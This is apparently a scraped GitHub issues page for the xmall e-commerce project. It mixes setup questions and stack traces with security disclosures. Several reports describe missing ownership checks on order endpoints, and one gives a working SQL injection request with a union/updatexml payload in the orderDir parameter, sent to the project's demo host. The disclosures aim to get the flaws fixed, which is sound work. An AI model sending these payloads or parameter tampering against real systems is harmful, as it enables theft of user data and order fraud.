exrick / xmall Goto Github PK
View Code? Open in Web Editor NEW基于SOA架构的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理系统:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等
Home Page: http://xmall.exrick.cn
License: GNU General Public License v3.0
基于SOA架构的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理系统:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等
Home Page: http://xmall.exrick.cn
License: GNU General Public License v3.0
[item] IndexNotFoundException[no such index]
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.indexNotFoundException(IndexNameExpressionResolver.java:728)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.innerResolve(IndexNameExpressionResolver.java:680)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.resolve(IndexNameExpressionResolver.java:636)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:163)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:138)
at org.elasticsearch.action.search.TransportSearchAction.resolveLocalIndices(TransportSearchAction.java:287)
at org.elasticsearch.action.search.TransportSearchAction.executeSearch(TransportSearchAction.java:301)
at org.elasticsearch.action.search.TransportSearchAction.lambda$doExecute$4(TransportSearchAction.java:193)
at org.elasticsearch.action.ActionListener$1.onResponse(ActionListener.java:60)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:114)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:87)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:215)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:68)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:167)
at org.elasticsearch.xpack.security.action.filter.SecurityActionFilter.apply(SecurityActionFilter.java:124)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:165)
at org.elasticsearch.action.support.TransportAction.execute(TransportAction.java:139)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:83)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:73)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler$1.doRun(SecurityServerTransportInterceptor.java:250)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler.messageReceived(SecurityServerTransportInterceptor.java:308)
at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:66)
at org.elasticsearch.transport.TcpTransport$RequestHandler.doRun(TcpTransport.java:1288)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.common.util.concurrent.EsExecutors$1.execute(EsExecutors.java:140)
2019-10-12 09:39:48,654 [DubboServerHandler-172.21.63.129:20882-thread-15] [com.alibaba.dubbo.rpc.filter.ExceptionFilter]-[ERROR] [DUBBO] Got unchecked and undeclared exception which called by 172.21.63.129. service: cn.exrick.search.service.SearchService, method: search, exception: cn.exrick.common.exception.XmallException: 查询ES索引库出错, dubbo version: 2.6.1, current host: 172.21.63.129
at org.elasticsearch.transport.TcpTransport.handleRequest(TcpTransport.java:1246)
cn.exrick.common.exception.XmallException: 查询ES索引库出错
at org.elasticsearch.transport.TcpTransport.messageReceived(TcpTransport.java:1110)
at cn.exrick.search.service.impl.SearchServiceImpl.search(SearchServiceImpl.java:176)
at org.elasticsearch.transport.TcpTransport.inboundMessage(TcpTransport.java:913)
at org.elasticsearch.transport.netty4.Netty4MessageChannelHandler.channelRead(Netty4MessageChannelHandler.java:53)
at com.alibaba.dubbo.common.bytecode.Wrapper1.invokeMethod(Wrapper1.java)
at com.alibaba.dubbo.rpc.proxy.javassist.JavassistProxyFactory$1.doInvoke(JavassistProxyFactory.java:45)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.proxy.AbstractProxyInvoker.invoke(AbstractProxyInvoker.java:71)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.config.invoker.DelegateProviderMetaDataInvoker.invoke(DelegateProviderMetaDataInvoker.java:48)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at com.alibaba.dubbo.rpc.protocol.InvokerWrapper.invoke(InvokerWrapper.java:52)
at io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:323)
at com.alibaba.dubbo.rpc.filter.ExceptionFilter.invoke(ExceptionFilter.java:61)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:297)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.monitor.support.MonitorFilter.invoke(MonitorFilter.java:74)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340) at com.alibaba.dubbo.rpc.filter.TimeoutFilter.invoke(TimeoutFilter.java:41)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.handler.logging.LoggingHandler.channelRead(LoggingHandler.java:241)
at com.alibaba.dubbo.rpc.protocol.dubbo.filter.TraceFilter.invoke(TraceFilter.java:77)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.filter.ContextFilter.invoke(ContextFilter.java:71)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1434)
at com.alibaba.dubbo.rpc.filter.GenericFilter.invoke(GenericFilter.java:131)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.filter.ClassLoaderFilter.invoke(ClassLoaderFilter.java:37)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:965)
at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:163)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:656)
at com.alibaba.dubbo.rpc.filter.EchoFilter.invoke(EchoFilter.java:37)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:556)
at com.alibaba.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102)
at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:510)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:96)
at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:470)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:168)
at io.netty.util.concurrent.SingleThreadEventExecutor$5.run(SingleThreadEventExecutor.java:909)
at com.alibaba.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:50)
at java.lang.Thread.run(Thread.java:745)
at com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:79)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Recently, our team found an arbitrary order cancel vulnerability in the latest version of the project.
The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L54
Unauthorized access to the /member/cancelOrder
API enables attackers to manipulate the post param order
and cancel orders belonging to other users.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the cancel operation.
我这边 通过 npm run build 然后把dist目录下的文件放到Tomcat中, 看前端 默认的是 去 请求的 http://localhost:8080 这个地址的 接口。而我的后台服务 部署在另外一台电脑上
Recently, our team found an arbitrary order free payment vulnerability in the latest version of the project. The vulnerability logic is located within the following file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L70
Unauthorized access to the /member/payOrder API allows attackers to manipulate the POST parameter tbThanks
, thereby altering the payment status of any order, resulting in unauthorized free payments.
To mitigate this vulnerability, we strongly recommend that developers implement access control policies to restrict changes to the payment status.
Recently, our team found an arbitrary order detail access vulnerability in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L28
Access to the /member/orderList
API is unauthorized, allowing attackers to manipulate the query param userId
and access other users' order details, potentially compromising user privacy data.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.
[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/Exrick/xmall
[Affected Product Code Base]
all version
[Affected Component]
[Attack Type]
Remote
[Vulnerability details]
Send the payload below to the interface /item/list
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: xmadmin.exrick.cn
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Referer: http://xmadmin.exrick.cn/product-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FC
Connection: close
[Impact Code execution]
true
[Cause of vulnerability]
In the /item/list
interface, the order[0][dir]
parameter is not filtered and passed into the getItemList
function.
Then it is passed into the selectItemByCondition
function.
In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml
, the orderDir
parameter is used in ${}
format, leading to a SQL injection vulnerability.
And there are the other similar interfaces:
That's all, thanks.
rt
修改请求中的userId可以往他人购物车中添加商品或者获取他人订单信息。
访问 首页商城 没有响应
Recently, our team found an arbitrary order deletion vulnerability in the latest version of the project.
The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L62
Unauthorized access to the /member/delOrder
API enables attackers to manipulate the query param orderId
and delete orders belonging to other users.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the delete operation.
请问你的购物车商品数据是直接放在redis而没有持久化到mysql吗?如果是这样的话是否合理呢?
update x set num = x where id = x and num = 原库存数
,单表推荐GET http://localhost:8888/lib/gt.js net::ERR_ABORTED
导致
$.ajax({ url: '/geetestInit?t=' + (new Date()).getTime(), // 加随机数防止缓存 type: "GET", dataType: 'json', success: function (data) { initGeetest({ gt: data.gt, challenge: data.challenge, new_captcha: data.new_captcha, // 用于宕机时表示是新验证码的宕机 offline: !data.success, // 表示用户后台检测极验服务器是否宕机,一般不需要关注 product: "popup", // 产品形式,包括:float(点击汉字),popup(滑动) width: "100%" }, handler); } });
这里无法初始化
你这个是基于单商户还是多商户?
请问1G内存小机器跑商场前后端项目够用吗?
大佬的商城自动发送邮件的功能这部分可能出故障了,希望大佬看到后发一份单体版的xmall,时间有点紧急,麻烦了
Recently, our team found an arbitrary order detail access vulnerability (different with #79) in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L36
The developer failed to check the ownership of the order
with the access user when querying the order details via orderService.getOrder()
, allowing attackers to manipulate the query param orderId
of API /member/orderDetail
and access other users' order details, potentially compromising user privacy data.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.
请教有没有做持续集成的思路,现在因为不同模块没有1个总的pom.xml文件,卡在编译这块。谢谢。
亲!可以看你一下你的数据库设计吗?
支付成功后没有小程序源码吗
很多用户相关的操作都没有进行权限验证。项目中token基本没有用到
能够将视频教程,改造成这样的开源项目确实牛逼。膜拜下作者👍
后台管理系统分享一下源代码
Recently, our team found an arbitrary order addition vulnerability in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L46
Access to the /member/addOrder
API is unauthorized, allowing attackers to add orders as any user via a crafted orderInfo
object.
To address this vulnerability, we strongly recommend that developers implement access control policies to limit the order addition operation.
应该不是我网络的问题。
大神。el-autocomplete,搜索线上没实现,是功能没完善吗?
设置了ElasticSearch的ik分词器,但是前台商城搜索商品时,不支持中文搜索
{"success":false,"message":"你手速怎么这么快,请点慢一点","code":500,"timestamp":1545190498198,"result":null} 是啥问题
更换旧版本火狐浏览器,还可以用。
请问能看一下么
Hi
I found a security vulnerability in the XMALL application.
Where should I disclose it?
Thanks,
Ori.
此项目将作为作者2018年本科毕业设计项目,现提前开源,请勿盗用。完成毕业设计后将完成部署、完善详细文档、项目架构等内容。
org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'shiroFilter': Unsatisfied dependency expressed through field 'systemService'; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'systemService': FactoryBean threw exception on object creation; nested exception is java.lang.IllegalStateException: Failed to check the status of the service cn.exrick.manager.service.SystemService. No provider available for the service cn.exrick.manager.service.SystemService from the url zookeeper://127.0.0.1:2181/com.alibaba.dubbo.registry.RegistryService?application=xmall-manager-web&dubbo=2.6.1&interface=cn.exrick.manager.service.SystemService&methods=countLog,deleteLog,getLogList,updateBase,getWeekHot,getShiroFilter,countShiroFilter,addLog,addShiroFilter,getBase,updateShiroFilter,deleteShiroFilter&pid=42124®ister.ip=169.254.135.39&revision=1.0-SNAPSHOT&side=consumer×tamp=1529023738625 to the consumer 169.254.135.39 use dubbo version 2.6.
你好,单机版本的搜索功能一直提示出错,请问是否有修正
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.